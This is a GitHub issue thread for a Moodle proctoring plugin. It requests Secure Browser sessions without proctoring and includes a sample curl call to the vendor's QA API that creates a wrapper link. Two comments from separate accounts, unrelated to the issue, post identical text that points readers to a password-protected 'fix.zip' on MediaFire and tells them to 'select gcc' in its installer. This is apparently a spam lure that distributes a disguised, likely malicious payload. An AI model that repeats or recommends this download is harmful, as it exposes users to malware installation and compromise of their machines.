### ISSUE TITLE
Provision Secure Browser without Proctoring

### ISSUE THREAD

**Issue by devang1281** [talview/moodle-local_proview#98]
**Is your feature request related to a problem? Please describe.**
Give the option of enabling Secure Browser without enabling proctoring for a quiz.

**Describe the solution you'd like**
Generate a wrapper link and provide the same for sessions with Secure Browser without Proctoring

Sample Curl for generating Wrapper link:
```shell
curl --request POST \
  --url https://moodle-proview-api-qa.talview.org/proview/wrapper/create \
  --header 'Content-Type: application/json' \
  --data '{ "proview_token": "e376b1ec-4a5b-43d9-8821-72de13f7554a", "type": "live_proctor", "session_title": "Proview live session", "session_external_id": "123", "attendee_external_id": "728567812", "redirect_url": "https://testing.tlv/test/", "is_iframe_supported": true, "show_end_proctoring": true, "additional_instruction": [ "Read the instructions carefully before starting the session.?" ], "preview_style": "abcf", "expiry": "2024-03-18T13:37:12.620Z", "is_secure_browser": true, "secure_browser": { "blacklisted_softwares_windows": [ "teams", "lenovo vantage" ], "blacklisted_softwares_mac": [ "teams", "quicktime" ], "is_minimize": true, "is_record_screen": true } }'
```

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by amithPatel21A** [comment]
Tested for the moodle assessment with non-proctored session. Able to attend and complete

**Comment by amithPatel21A** [comment]
Tested in moodle production instance
working as expected
checked for non proctored SB quiz - amith non proc SB
